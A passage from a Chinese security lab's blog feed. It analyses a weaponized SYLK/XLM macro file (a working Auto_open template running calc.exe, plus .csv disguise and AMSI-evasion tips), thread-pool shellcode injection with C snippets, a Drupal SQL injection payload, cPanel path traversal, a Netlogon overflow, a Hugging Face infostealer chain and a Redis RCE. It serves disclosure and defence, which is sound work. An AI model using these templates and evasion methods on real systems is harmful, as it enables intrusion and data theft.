\n受保护视图沙箱的豁免:当文件从互联网下载时,Windows 会为其附加\"网络标记\"(Mark of the Web, MotW)。对于常规 Office 文件,MotW 会触发受保护视图沙箱,阻止宏执行并显示安全警告。然而,SYLK 文件格式不适用此沙箱机制。用户双击打开恶意 .slk 文件时,不会经历受保护视图的安全屏障。
邮件与浏览器网关的通行证:SYLK 文件在传输阶段几乎不受拦截:
\n.slk.slk.slk 标记为危险文件类型这意味着经过武器化的 .slk 文件可以通过电子邮件附件或云存储链接,以极高的送达率出现在目标用户的收件箱中。
VBA 宏无法嵌入 SYLK 格式,但 Excel 4.0/XLM 宏可以通过手工构造记录行的方式原生嵌入。Excel 的\"另存为\"功能会主动剥离宏代码,但手工编写的 .slk 文件绕过了这一剥离过程——Excel 在解析时直接执行嵌入的宏指令。
以下为实验验证的基本构造示例:
\nID;P
O;E
NN;NAuto_open;ER101C1
C;X1;Y101;EEXEC(\"CALC.EXE\")
C;X1;Y102;EHALT()
E
逐行解析:
\n| 行号 | 记录 | 含义 |
|---|---|---|
| 1 | ID;P | 声明文件类型为 SYLK,P 表示生产型文件 |
| 2 | O;E | 全局选项记录,E 子记录指明\"此文档包含宏\" |
| 3 | NN;NAuto_open;ER101C1 | 定义命名区域,将 R101C1 命名为 Auto_open(XLM 宏的自动执行事件触发器,等同于 VBA 的 Auto_Open) |
| 4 | C;X1;Y101;EEXEC(\"CALC.EXE\") | 定义第 1 列第 101 行单元格,表达式值为 XLM 宏函数 EXEC(\"CALC.EXE\") |
| 5 | C;X1;Y102;EHALT() | 第 1 列第 102 行单元格执行 HALT(),终止宏执行 |
| 6 | E | 文件结束符 |
行长度限制:SYLK 文件每行不得超过 260 字符,超过该限制时 Excel 将拒绝解析该行。这一约束对长 payload 的构造构成限制。
\n本地化适配:Auto_open 是语言相关的触发器名称。在荷兰语版本中须写为 Auto_openen,德语中为 Auto_öffnen。跨语言攻击场景需适配对应的本地化名称。
EXEC() 与 HALT() 仅为 XLM 宏能力的极小一部分。完整的 XLM 宏指令集支持以下攻击原语:
URLDownloadToFile 结合 EXEC 实现动态下载与执行GET.WORKSPACE 检测鼠标移动、最近文件列表等沙箱特征SYLK 作为 XLM 宏的传输容器,直接继承了上述全部攻击能力。武器化的 .slk 文件等价于一个携带完整后门逻辑的轻量级恶意文档,且其攻击链中几乎每一步都享有防御豁免。
SYLK 文件的一个特性是:Excel 会依据文件内容而非扩展名来识别格式。具体而言,若一个文件以 ID;P 开头,即使扩展名为 .csv,Excel 也会识别其为 SYLK 格式,并向用户弹出确认对话框。
攻击者可利用此特性:
\nID;P 开头的恶意文件.csv,伪装为\"客户名单\"、\"交易记录\"等看似无害的表格Microsoft Office for Mac 同样原生支持 SYLK 格式与 XLM 宏。.slk 扩展名默认映射至 Mac 版 Excel,且 Auto_open 触发器在 Mac 环境下完全有效。
值得注意的是,Microsoft Office for Mac 2011 存在一个已公开但不再修复的漏洞:打开包含宏的 SYLK 文件时不显示任何安全警告,宏直接静默执行。由于该版本已终止生命周期支持,此漏洞成为永久性零日。尽管 Office 2011 的用户量逐年下降,但仍构成一条持续开放的未修复攻击路径。
\nSYLK 文件基于 ANSI 文本,结构简单,理论上应易于检测。然而实际测试表明,大多数主流安全产品对恶意 .slk 文件的检测签名和启发式规则均严重滞后。原因可归因于以下三点:
.slk 在野样本量相对较小,未引起安全厂商充分关注反恶意软件扫描接口(AMSI)是 Windows 针对动态内容的关键防御层,为安全产品提供对脚本、宏、PowerShell 等执行上下文的可见性。然而在 SYLK 攻击场景中,AMSI 完全不起作用。
\n根本原因在于:AMSI 的宏扫描引擎仅与 VBA 运行时交互,无法理解 Excel 4.0/XLM 宏的语法与执行上下文。当恶意宏通过 SYLK 文件的 XLM 指令执行时,AMSI 无法感知任何可疑活动。这构成了一个完整的、从文件传输到代码执行的 AMSI 盲区攻击链。
\n.slk 加入阻止扩展名列表ID;P 开头的 .csv 文件进行内容类型检查与告警EXEC、URLDownloadToFile 等敏感 API 的调用.slk 及 .csv 文件保持警惕SYLK 文件格式的滥用并非零日漏洞,而是一种对\"历史信任\"的利用。它仅需要一个被安全生态系统性忽视的古老文件格式,加上一层被现有检测工具忽略的宏执行引擎,即可构成完整的攻击链。
\n这一案例揭示了一个更深层的安全启示:在纵深防御体系的构建中,兼容性设计往往与安全设计存在根本性矛盾。每一层为维持向后兼容而保留的\"历史豁免\",都可能成为攻击者绕过多层防御的捷径。对安全研究者而言,系统性地审视那些因\"过于老旧\"而未被纳入威胁模型的协议与格式,可能是发现下一代攻击面的关键路径。
\n[1] Microsoft Corporation. \"SYLK File Format Reference.\" https://learn.microsoft.com/en-us/office/
\n[2] Nelson, M. \"DDE Attacks in SYLK Files.\" https://posts.specterops.io/
\n[3] Microsoft Corporation. \"Anti-Malware Scan Interface (AMSI).\" https://learn.microsoft.com/en-us/windows/win32/amsi/
\n[4] Microsoft Corporation. \"Excel 4.0 Macro Functions Reference.\" https://learn.microsoft.com/en-us/office/client-developer/excel/
", "url": "https://www.ce.ac.cn/blog/sylk-xlm-macro-security-analysis/", "title": "SYLK 文件格式的武器化滥用:基于 Excel 4.0/XLM 宏的隐蔽攻击链分析", "summary": "针对 SYLK 文件格式承载 Excel 4.0/XLM 宏的攻击面分析,研究其在受保护视图豁免、AMSI 盲区及邮件网关绕过等方面的安全缺陷。", "date_modified": "2026-05-21T00:00:00.000Z", "author": { "name": "ICE Lab" }, "tags": [ "Vulnerability", "Research", "Disclosure" ] }, { "id": "https://www.ce.ac.cn/blog/windows-thread-pool-injection-analysis/", "content_html": "传统的进程注入技术——包括 CreateRemoteThread、NtCreateThreadEx 及 QueueUserAPC——均依赖于在目标进程中创建新线程或在现有线程中插入 APC 对象,这些操作均会被端点检测与响应(EDR)系统的用户态钩子所监控。本文分析一种利用 Windows 原生线程池机制实现进程注入的替代方法。该技术通过将 Shellcode 封装为线程池工作项,提交至目标进程的线程池队列中,由线程池的现有空闲线程自动执行,全程无需调用线程创建相关 API,从而规避基于线程创建监控的检测规则。本文对该技术的原理、实现约束及适用范围进行了系统分析,并从监控策略与内核级检测两个维度提出了相应的防御建议。
关键词:进程注入;线程池;EDR 绕过;Windows 安全;攻击面分析
\n进程注入是红蓝对抗中最基础也最常被使用的技术之一。从最初的 CreateRemoteThread,到 NtCreateThreadEx、SetThreadContext 结合 ResumeThread,再到基于异步过程调用(APC)的注入技术,攻击者与防御者围绕\"如何在目标进程中执行任意代码\"这一命题展开了长期的攻防博弈。
每一次注入技术的演进,本质上都是攻击者对防御检测维度的重新选择。传统注入技术之所以被 EDR 有效检测,根本原因在于它们都需要调用特定的 Windows API 来创建或操纵线程执行流,而这些 API 恰恰是 EDR 用户态钩子的核心监控对象。
\n2023 年,SafeBreach 实验室披露了一种利用 Windows 线程池机制实现进程注入的新型技术。该技术的核心思想是:不创建新线程,而是将恶意代码封装为线程池工作项(Work Item),提交到目标进程的现有线程池中,由系统线程池的已有空闲线程执行。由于整个过程完全绕过了线程创建 API,EDR 基于内核回调或用户态钩子的线程监控机制将完全失效。
\n本文对该技术的原理、实现与检测进行了系统性分析。
\nWindows 线程池是一组由系统预先创建的线程,用于高效处理异步任务、定时器回调及等待对象。在 Windows Vista 及之后的版本中,每个进程默认包含一个由系统管理的线程池。线程池的核心组件包括:
\n线程池相关 API 是 Windows 原生提供的线程池编程接口,主要包括:
\n| API | 功能 |
|---|---|
CreateThreadpool | 创建自定义线程池实例 |
CreateThreadpoolWork | 创建工作项,指定回调函数与参数 |
SubmitThreadpoolWork | 将工作项提交至线程池执行队列 |
WaitForThreadpoolWorkCallbacks | 等待工作项执行完成 |
CloseThreadpoolWork | 关闭并释放工作项 |
这些 API 的设计初衷是简化异步编程模型,其回调函数在提交后由线程池中的空闲线程调用执行。
\n线程池注入的核心思路可概括为:在目标进程的内存空间中写入 Shellcode,然后构造一个线程池工作项,将其回调函数指针指向 Shellcode 的入口地址,最后将该工作项提交至目标进程的线程池。
\n由于线程池工作项的执行由系统线程池调度器管理,不需要调用 CreateRemoteThread 或 NtCreateThreadEx,因此 EDR 安装在上述 API 上的用户态钩子不会被触发。
线程池注入的实现包含以下四个步骤:
\n步骤一:获取目标进程句柄。通过进程名、PID 或窗口句柄等方式定位并打开目标进程,获取具有必要访问权限的进程句柄。
\n步骤二:内存分配与 Shellcode 写入。在目标进程中调用 VirtualAllocEx 分配具有读写执行权限(PAGE_EXECUTE_READWRITE)的内存区域,并通过 WriteProcessMemory 写入 Shellcode 载荷。
步骤三:创建工作项。调用 CreateThreadpoolWork API,将工作项的回调函数指针设置为 Shellcode 在目标进程中的地址:
PTP_WORK work = CreateThreadpoolWork(
(PTP_WORK_CALLBACK)shellcodeAddr,
NULL, // 回调参数(可选)
NULL // 线程池环境(NULL 表示使用默认线程池)
);
步骤四:提交工作项。调用 SubmitThreadpoolWork 将工作项提交至线程池。线程池调度器会将其分配至一个空闲线程执行:
SubmitThreadpoolWork(work);
此时,Shellcode 在目标进程上下文中被执行,整个注入过程完成。
\n尽管线程池注入在绕过 EDR 方面表现出显著优势,但其在实际应用中仍面临以下约束:
\nSubmitThreadpoolWork 默认将工作项提交至调用进程的线程池,而非目标进程。若要注入远程进程,需要在目标进程中创建线程池或利用现有机制实现跨进程工作项投递,这增加了实现复杂度。线程池注入技术的主要攻击优势在于其检测规避能力。2026 年 4 月的独立测试显示,采用该技术的 Shellcode 加载器在 VirusTotal 平台上的检出率为 0/67,CrowdStrike、SentinelOne、Microsoft Defender 等主流 EDR 均未产生告警。
\n适用场景包括:
\nsvchost.exe、explorer.exe 等系统常驻进程,实现跨会话持久化线程池注入技术对基于用户态 API 钩子的 EDR 具有天然免疫能力,但并非无法检测。以下检测维度仍然有效:
\nPsSetCreateThreadNotifyRoutine)的检测机制可捕获线程创建事件,但对于线程池已存在线程的执行则无法区分。PAGE_EXECUTE_READWRITE 内存区域进行周期性扫描,仍然可以检测到 Shellcode 的存在。CreateThreadpoolWork 与 SubmitThreadpoolWork 的异常调用模式,尤其是来自非可信进程(如浏览器、办公软件)的调用,可作为检测指标。EDR 产品应将 CreateThreadpoolWork、SubmitThreadpoolWork、SetThreadpoolThreadMaximum 等线程池 API 纳入监控范围,对来自低信誉进程的线程池操作调用进行告警。
启用 Windows LSA 保护(RunAsPPL),限制对关键系统进程的访问权限。采用内核驱动监控线程池工作项的提交与执行行为,识别异常的回调函数地址。
对于关键进程(如 lsass.exe、svchost.exe),启用额外的访问控制策略,防止非授权进程通过 VirtualAllocEx 和 WriteProcessMemory 进行内存操作。Windows Defender Application Control(WDAC)可有效限制未签名代码的执行。
Windows 线程池注入技术代表了进程注入技术从\"创建线程\"到\"复用线程\"的范式转变。它并非利用系统漏洞,而是利用线程池这一原生机制的设计特性——工作项回调由现有线程池线程执行,天然绕过了基于线程创建事件的检测模型。
\n然而,任何攻击技术都有其适用范围和局限性。线程池注入在跨进程场景下的实现复杂度较高,且无法规避基于内存扫描与行为分析的高级检测。对防御者而言,理解线程池注入的技术原理,有助于构建更加完善的、覆盖用户态与内核态的多层次检测体系。
\n[1] SafeBreach Labs. \"Process Injection Using Windows Thread Pools.\" https://www.safebreach.com/blog/process-injection-using-windows-thread-pools
\n[2] Microsoft Corporation. \"Thread Pool API Reference.\" https://learn.microsoft.com/en-us/windows/win32/procthread/thread-pool-api
\n[3] Microsoft Corporation. \"Windows Defender Application Control.\" https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/
", "url": "https://www.ce.ac.cn/blog/windows-thread-pool-injection-analysis/", "title": "基于 Windows 线程池机制的隐蔽进程注入技术分析与评估", "summary": "针对 Windows 线程池工作项注入技术的系统性分析,研究其在绕过 EDR 线程创建监控方面的原理、实现方法与检测对策。", "date_modified": "2026-05-21T00:00:00.000Z", "author": { "name": "ICE Lab" }, "tags": [ "Vulnerability", "Research", "Linux" ] }, { "id": "https://www.ce.ac.cn/blog/drupal-core-sql-injection-cve-2026-9082/", "content_html": "2026年5月20日,Drupal 官方发布安全公告 SA-CORE-2026-004,披露了 Core 中一处未授权 SQL 注入漏洞(CVE-2026-9082,CVSSv3 6.5)。漏洞存在于 PostgreSQL 特定的实体查询条件处理逻辑中,攻击者可利用 JSON:API 模块的过滤参数构造恶意数组键,操纵 PDO 命名占位符解析过程,在未认证条件下对 PostgreSQL 数据库执行任意 SQL 命令。本分析从漏洞原理、影响范围、复现验证及修复方案四个维度展开讨论。
\n关键词:Drupal;SQL 注入;PostgreSQL;JSON:API;PDO 占位符;CVE-2026-9082
\nDrupal 是一个开源内容管理框架(CMF),广泛用于构建企业级网站与 Web 应用。JSON:API 模块是 Drupal Core 的标准组件,提供基于 RESTful 规范的数据交互接口,允许客户端通过标准化查询参数对实体数据进行过滤、排序与分页。
\n近期披露的 CVE-2026-9082 涉及 JSON:API 模块中过滤器参数处理与 PostgreSQL 数据库层之间的交互缺陷。该漏洞的利用无需身份验证,且 PoC 与 EXP 均已公开,对部署 PostgreSQL 后端的 Drupal 站点构成实际威胁。
\n漏洞的根源位于 Drupal Core 中 PostgreSQL 数据库驱动特有的实体查询条件类。该类中的 translateCondition() 方法在处理数组类型过滤条件时存在逻辑缺陷。
在 Drupal 的数据库抽象层中,SQL 查询使用 PDO(PHP Data Objects)的命名占位符机制来防止 SQL 注入。translateCondition() 方法遍历 $condition['value'] 数组,并直接将数组键(key)嵌入为 PDO 占位符名称的组成部分。由于 JSON:API 允许客户端通过 URL 参数 filter[x][condition][value][USER_CONTROLLED_KEY]=val 形式传入任意数组键,攻击者可控制占位符名称的具体内容。
PDO 命名占位符解析规则限定有效字符集为 [a-zA-Z0-9_]。当攻击者构造的数组键中包含特殊字符(如右括号 ))时,PDO 解析器会停止占位符名称的识别,该字符及后续内容将被视为字面 SQL 文本,直接拼接到查询语句中。
以 IN() 子句为例,正常情况下生成的查询形式为:
WHERE field IN (:placeholder_0, :placeholder_1)
攻击者通过构造恶意键 ) OR 1=1 -- 作为数组键,可导致占位符解析提前终止,形成:
WHERE field IN (:placeholder_0, :placeholder_) OR 1=1 --)
后续 SQL 载荷被直接注入执行,从而实现任意 SQL 命令执行。
\n利用该漏洞需满足以下条件:
\nMySQL 及 SQLite 等其他数据库后端不受该漏洞影响。
\n以下版本的 Drupal Core 受该漏洞影响:
\n8.9.0 ≤ Drupal < 10.4.1010.5.0 ≤ Drupal < 10.5.1010.6.0 ≤ Drupal < 10.6.911.0.0 ≤ Drupal < 11.1.1011.2.0 ≤ Drupal < 11.2.1211.3.0 ≤ Drupal < 11.3.10由于 JSON:API 是 Drupal Core 的标准模块,大量站点默认启用了该功能。结合 PostgreSQL 在 Drupal 企业级部署中的较高市场占有率,该漏洞的实际影响面较为广泛。攻击者可利用漏洞执行时间盲注数据提取、权限枚举或进一步的后渗透操作。
\nICE Lab 已在受控环境中对 CVE-2026-9082 完成复现验证。在运行 Drupal 11.3.9、启用 JSON:API 功能且数据库类型为 PostgreSQL 的服务器上,以匿名身份通过构造恶意的 filter URL 参数成功触发了 SQL 注入,验证了漏洞的可利用性。
Drupal 官方已在以下版本中修复该漏洞:
\nDrupal ≥ 10.4.10Drupal ≥ 10.5.10Drupal ≥ 10.6.9Drupal ≥ 11.1.10Drupal ≥ 11.2.12Drupal ≥ 11.3.10建议系统管理员通过 Composer 执行版本升级:
\ncomposer update drupal/core --with-all-dependencies
对于无法立即升级的环境,建议临时禁用 JSON:API 模块作为缓解措施。
\nCVE-2026-9082 是 Drupal Core 中一处针对 PostgreSQL 数据库的 SQL 注入漏洞,其根因在于实体查询条件类对数组键的处理未做充分过滤,结合 PDO 命名占位符的解析特性形成注入向量。由于利用无需认证且影响版本跨度大,部署 PostgreSQL 的 Drupal 站点需尽快完成版本更新。
\n[1] Drupal. \"SA-CORE-2026-004.\" https://www.drupal.org/sa-core-2026-004
\n[2] CVE Program. \"CVE-2026-9082.\" https://www.cve.org/CVERecord?id=CVE-2026-9082
", "url": "https://www.ce.ac.cn/blog/drupal-core-sql-injection-cve-2026-9082/", "title": "Drupal Core PostgreSQL SQL 注入漏洞分析(CVE-2026-9082)", "summary": "针对 Drupal Core JSON:API 模块中 PostgreSQL 特定 SQL 注入漏洞(CVE-2026-9082)的技术分析,涉及 PDO 命名占位符注入与数组键操控攻击。", "date_modified": "2026-05-20T00:00:00.000Z", "author": { "name": "ICE Lab" }, "tags": [ "Vulnerability", "Disclosure", "Research" ] }, { "id": "https://www.ce.ac.cn/blog/cpanel-whm-arbitrary-file-read-cve-2026-29205/", "content_html": "2026年5月13日,cPanel 官方发布安全更新,修复了 cpdavd 服务中的一个高危漏洞(CVE-2026-29205,CVSSv3 8.6)。该漏洞源于 cpdavd 附件下载端点存在权限管理错误与路径过滤不足,攻击者可利用构造的特制文件路径参数,在未认证条件下以 root 权限读取服务器任意文件,涵盖系统配置文件、数据库凭证及 SSL 私钥等敏感信息。本分析从漏洞原理、影响范围、复现验证及修复方案四个维度展开讨论。
\n关键词:cPanel;WHM;任意文件读取;路径遍历;CVE-2026-29205
\ncPanel & WHM 是全球广泛使用的 Linux Web 托管控制面板。WHM 提供服务器级管理能力,cPanel 面向站点用户提供网站、域名、数据库及邮件等运维管理功能,广泛应用于虚拟主机、IDC 机房、云服务商及企业自建托管环境。该平台支持图形化操作与自动化配置,是 Web 托管领域部署最普遍的管理平台之一。
\ncpdavd 是 cPanel 中负责 WebDAV 及 CalDAV/CardDAV 功能的后台服务组件,用于处理邮件客户端及日历同步相关的附件存储与检索请求。CVE-2026-29205 即存在于该组件的附件下载端点中。
\ncpdavd 服务在处理附件下载请求时存在两类安全缺陷:
\n攻击者利用该漏洞需满足两个前置条件:
\n满足条件后,攻击者可构造包含路径遍历序列(如 ../)的特制请求,绕过服务的访问控制检查,以 root 权限读取目标文件系统中的任意文件。
成功利用该漏洞可导致以下敏感信息泄露:
\n/etc/passwd、/etc/shadow)该漏洞利用复杂度较低,且技术细节与 PoC 均已公开,具备较高的在野利用风险。
\n以下版本的 cPanel & WHM 受该漏洞影响:
\n11.124.0.0 ≤ version < 11.124.0.4011.126.0.0 ≤ version < 11.126.0.6111.130.0.0 ≤ version < 11.130.0.2511.132.0.0 ≤ version < 11.132.0.3411.134.0.0 ≤ version < 11.134.0.2811.136.0.0 ≤ version < 11.136.0.1211.120.1.0 ≤ WP Squared < 11.136.1.15根据全球资产测绘数据,与该漏洞关联的全球风险资产总数约为 141.8 万,涉及独立 IP 约 21.9 万个。受影响资产主要分布于 Web 托管服务商及 IDC 机房,其中运行较早版本(11.124–11.130 系列)的服务实例面临最高的利用风险。
\nICE Lab 已在受控环境中对 CVE-2026-29205 完成复现验证。通过向 cpdavd 服务发送特制的 HTTP 请求,可在未认证条件下成功读取目标系统上的任意文件(如 /etc/passwd)。复现过程验证了漏洞的可利用性,并确认 PoC 代码的有效性。
cPanel 官方已在以下版本中修复该漏洞:
\ncPanel & WHM 11.124.* ≥ 11.124.0.40cPanel & WHM 11.126.* ≥ 11.126.0.61cPanel & WHM 11.130.* ≥ 11.130.0.25cPanel & WHM 11.132.* ≥ 11.132.0.34cPanel & WHM 11.134.* ≥ 11.134.0.28cPanel & WHM 11.136.* ≥ 11.136.0.12WP Squared ≥ 11.136.1.15建议系统管理员通过 cPanel 后台更新功能或包管理器执行版本升级。对于无法立即升级的环境,应通过防火墙策略限制对 cpdavd 服务端口(2079/2080)的外部访问,作为临时缓解措施。
\nCVE-2026-29205 是 cPanel & WHM cpdavd 组件中一处高危任意文件读取漏洞,其根因在于权限管理缺陷与输入验证不足的组合。由于漏洞利用无需认证且影响版本覆盖广泛,全球范围内存在大量暴露面。官方补丁已发布,建议相关用户尽快完成版本更新。
\n[1] cPanel. \"Security CVE-2026-29205: cPanel & WHM & WP2 Security Update (May 13, 2026).\" https://support.cpanel.net/hc/en-us/articles/40437020299927-Security-CVE-2026-29205-cPanel-WHM-WP2-Security-Update-May-13-2026
\n[2] SLCyber. \"New Age of Collisions: Reading Arbitrary Files Pre-Auth as Root in cPanel (CVE-2026-29205).\" https://slcyber.io/research-center/new-age-of-collisions-reading-arbitrary-files-pre-auth-as-root-in-cpanel-cve-2026-29205/
", "url": "https://www.ce.ac.cn/blog/cpanel-whm-arbitrary-file-read-cve-2026-29205/", "title": "cPanel & WHM 任意文件读取漏洞分析(CVE-2026-29205)", "summary": "针对 cPanel & WHM cpdavd 服务任意文件读取漏洞(CVE-2026-29205)的技术分析,涉及路径遍历与认证绕过导致的 root 权限文件读取。", "date_modified": "2026-05-13T00:00:00.000Z", "author": { "name": "ICE Lab" }, "tags": [ "Vulnerability", "Disclosure", "Research" ] }, { "id": "https://www.ce.ac.cn/blog/windows-netlogon-zero-click-rce-cve-2026-41089/", "content_html": "2026年5月12日,Microsoft 披露了 Windows Netlogon 服务中存在一处已遭在野利用的零点击远程代码执行漏洞(CVE-2026-41089,CVSSv3 9.8)。漏洞位于 Netlogon 处理 CLDAP(Connectionless LDAP)查询的 NlGetLocalPingResponse 函数中,该函数分配的 528 字节栈缓冲区在通过 BuildSamLogonResponse 与 NetpLogonPutUnicodeString 处理攻击者可控的用户名字段时,因字节长度与 WCHAR 长度计算混淆导致缓冲区溢出。攻击者可向目标域控制器的 UDP 389 端口发送特制 CLDAP 请求,无需身份凭证、无需用户交互,即可实现以 SYSTEM 权限执行任意代码的域控完全接管。本分析从漏洞原理、攻击向量、影响范围及修复方案四个维度展开讨论。
关键词:Netlogon;CLDAP;栈缓冲区溢出;零点击远控;域控制器;CVE-2026-41089
\nWindows Netlogon 是 Windows Server 域环境的核心身份验证服务,负责域内计算机登录、身份校验、安全通道建立与维护,是 Active Directory 认证体系的基础组件,广泛应用于政企域架构中。该服务默认在域控制器的 UDP 389 端口上监听 CLDAP 请求,无需任何身份验证即可接入。
\nCVE-2026-41089 是该服务近年来继 Zerologon(CVE-2020-1472)之后出现的又一起高危漏洞。与 Zerologon 聚焦于密码学初始向量缺陷不同,本文分析的漏洞根源在于 Netlogon 内部响应构造逻辑中的缓冲区长度计算错误——一个经典的字节/WCHAR 混淆问题。
\nCLDAP 是轻量目录访问协议的无连接变体,域控制器使用 Netlogon 服务处理来自域成员及外部机器的 CLDAP 查询请求。当域控制器收到 CLDAP ping 请求时,NlGetLocalPingResponse 函数负责构造响应消息。
该函数在栈上分配一个固定大小的响应缓冲区,随后调用 BuildSamLogonResponse 将域控域名、站点名、用户名等可变长度字段写入该缓冲区。NetpLogonPutUnicodeString 辅助函数负责将 Unicode 字符串以 Length 字段前缀的方式写入缓冲区指定偏移。
漏洞的核心缺陷发生在 NetpLogonPutUnicodeString 的调用方与实现方之间对长度单位的不一致理解。在 Win32 API 约定中,涉及 Unicode 字符串的长度字段存在两种表达方式:以字节为单位(Length)和以 WCHAR 数量为单位。当调用方以字节长度计算所需缓冲区空间,但实现方以 WCHAR 数量执行内存复制时,会发生以下溢出:
N 字节的栈缓冲区剩余空间足以容纳 B 字节的用户名字段B 个 WCHAR = B × 2 字节NlGetLocalPingResponse 分配的 528 字节栈缓冲区正是这一长度混淆的溢出目标代。攻击者构造远超缓冲区剩余空间的 WCHAR 字符串,导致栈溢出,进而以 SYSTEM 权限执行任意代码。
该漏洞的攻击向量具有以下显著特征:
\nNT AUTHORITY\\SYSTEM 身份运行,溢出后的代码执行直接获得最高权限以下 Windows Server 版本的 Netlogon 受该漏洞影响:
\n| 操作系统版本 | 修复版本 |
|---|---|
| Windows Server 2012 | ≥ 6.2.9200.26079 |
| Windows Server 2012 R2 | ≥ 6.3.9600.23181 |
| Windows Server 2016 | ≥ 10.0.14393.9140 |
| Windows Server 2019 | ≥ 10.0.17763.8755 |
| Windows Server 2022 | ≥ 10.0.20348.5074 / 10.0.20348.5139 |
| Windows Server 2022, 23H2 | ≥ 10.0.25398.2330 |
| Windows Server 2025 | ≥ 10.0.26100.32772 / 10.0.26100.32860 |
该漏洞影响量级为千万级。鉴于 Netlogon 是域控制器的强制启用服务,且 CLDAP 端口在域环境中默认对外暴露,全球范围内大量未打补丁的域控制器面临直接威胁。CVSSv3 评分 9.8 反映了其对机密性、完整性及可用性的全面影响。
\n本漏洞的特殊性在于其在公开披露前已被发现活跃利用。已观测到的在野利用活动表明,攻击者已将该漏洞武器化为域控制器渗透的初始入口。利用成功后,攻击者可实现域控完全接管,进而通过 DCSync 等域内凭据窃取技术向全域范围横向扩展。
\nZerologon(CVE-2020-1472)的历史经验表明,此类 Netlogon 零点击漏洞的武器化周期通常较短,且一旦利用代码进入攻击框架,大规模扫描与利用将迅速跟进。
\nMicrosoft 已在 2026 年 5 月安全更新中发布补丁。建议通过以下路径完成修复:
\n临时缓解措施:对无法立即安装补丁的环境,可通过防火墙 ACL 限制对域控制器 UDP 389 端口的外部网络访问,阻断来自非受信网络的 CLDAP 流量。但需注意,此措施仅缩小攻击面,不能根除漏洞。
\nCVE-2026-41089 是 Netlogon 服务内部响应构造逻辑中一处字节/WCHAR 长度计算混淆导致的栈缓冲区溢出漏洞,其零点击、无认证、SYSTEM 权限远程代码执行的攻击面特征使其成为域环境中最危险类型的漏洞之一。已在野利用的观测进一步提升了其紧急程度。域控制器管理员需立即确认域控版本并应用 2026 年 5 月安全更新。
\n[1] Microsoft Security Response Center. \"CVE-2026-41089: Windows Netlogon Remote Code Execution Vulnerability.\" https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41089
\n[2] CyberSecurityNews. \"Windows Netlogon 0-Click RCE Exploited in the Wild – Microsoft Confirms.\" https://cybersecuritynews.com/windows-netlogon-0-click-rce/
", "url": "https://www.ce.ac.cn/blog/windows-netlogon-zero-click-rce-cve-2026-41089/", "title": "Windows Netlogon 零点击远程代码执行漏洞分析(CVE-2026-41089)", "summary": "针对 Windows Netlogon CLDAP 栈缓冲区溢出漏洞(CVE-2026-41089)的技术分析,涉及字节/WCHAR 长度计算混淆导致的零点击 SYSTEM 权限远程代码执行。", "date_modified": "2026-05-12T00:00:00.000Z", "author": { "name": "ICE Lab" }, "tags": [ "Vulnerability", "Disclosure", "Research", "Privilege Escalation" ] }, { "id": "https://www.ce.ac.cn/blog/hugging-face-supply-chain-openai-typosquatting/", "content_html": "2026 年 5 月 7 日,安全研究机构 HiddenLayer 披露了一起针对 AI 开发社区的供应链投毒攻击。攻击者在 Hugging Face 平台创建恶意仓库 Open-OSS/privacy-filter,通过 typosquatting(仿冒命名)技术冒充 OpenAI 官方项目,并利用虚假账户将其推至趋势榜首位。该事件导致约 244,000 次 恶意下载,成为开源 AI 平台历史上最严重的大规模恶意软件分发事件之一。
核心 Payload:基于 Rust 语言开发的 Sefirah 信息窃取木马,具备反分析能力,窃取范围包括浏览器凭据、加密货币钱包、Discord 令牌及系统敏感信息。
\n| 阶段 | 文件/动作 | 恶意行为描述 |
|---|---|---|
| 第一阶段 | loader.py | 禁用 SSL 验证,远程获取 Base64 编码的 PowerShell 命令 |
| 第二阶段 | PowerShell | 下载并执行批处理文件 start.bat,进行权限提升 |
| 第三阶段 | start.bat | 添加 Defender 排除列表,下载并执行 Sefirah 木马 |
| 第四阶段 | Sefirah | 执行数据窃取与外泄 |
recargapopular[.]comWinOS 4.0 植入程序| 战术阶段 | 技术 ID | 技术名称 |
|---|---|---|
| 初始访问 | T1661 | 钓鱼攻击(社会工程) |
| 初始访问 | T1526 | 供应链攻陷 |
| 防御规避 | T1562.001 | 禁用安全工具(SSL 验证、Defender 排除) |
| 发现 | T1592.004 | 收集受害者主机信息 |
| 数据外泄 | T1041 | 通过 C2 信道外泄数据 |
此次事件揭示了开源 AI 生态系统面临的供应链安全挑战:
\n2026年5月5日,Redis 数据库中两条远程代码执行利用链被公开披露:RESTORE 机制双重释放漏洞(CVE-2026-25243,CVSSv3 8.8)与主从同步 Lua 引擎释放后使用漏洞(CVE-2026-23631,CVSSv3 8.1)。前者源于 RESTORE 命令反序列化流程中验证器与转换器之间的字节长度解析歧义,可导致 zipmap 编码哈希及 Stream Consumer Group 对象的双重释放;后者利用单线程模型下 Lua 超时钩子与外部主节点 FULLRESYNC 指令的竞态交互,导致全局 Lua 解释器环境被销毁后仍被引用。经身份验证的攻击者在满足配置条件下可将两类内存破坏原语转化为任意内存读写能力,最终实现远程代码执行。本分析分别拆解两条利用链的技术原理与攻击路径。
\n关键词:Redis;双重释放;释放后使用;远程代码执行;RESTORE;Lua 沙箱
\nRedis 是广泛使用的内存键值数据库,其单线程事件驱动架构在提供高性能的同时,也引入了独特的安全边界设计——Lua 脚本沙箱、主从复制协议与序列化格式的交互构成了复杂的攻击面。CVE-2026-25243 与 CVE-2026-23631 分别从反序列化解析与主从同步协议两个维度突破了 Redis 的内存安全边界,且两条利用链均需身份验证作为前置条件,属于经认证的远程代码执行(Authenticated RCE)范畴。
\nRESTORE 命令用于将序列化数据反序列化为 Redis 键值对象。其处理流程包含两个阶段:验证阶段(validator)对输入载荷进行格式与长度校验,转换阶段(converter)将验证通过的载荷转换为内部数据结构。两个阶段各自独立解析载荷的字节长度字段。
\n漏洞的核心在于验证器与转换器对同一载荷的字节长度解析逻辑存在不一致。当处理历史遗留的 zipmap 编码哈希以及 Stream Consumer Group 数据时,验证器按一种长度计算方式通过校验,而转换器按另一种方式解析实际数据,导致转换器写入的字节数超出验证器预期的缓冲区边界。
\n这种长度歧义在特定载荷构造下可触发双重释放(double-free):转换器在释放旧对象并分配新对象的过程中,因长度计算错误导致同一内存块被释放两次。攻击者通过精心构造的 RESTORE 载荷,利用 Jemalloc 内存分配器的确定性行为,将双重释放转化为堆块重叠(heap chunk overlap),建立任意内存读写原语。
\n利用链可分解为以下阶段:
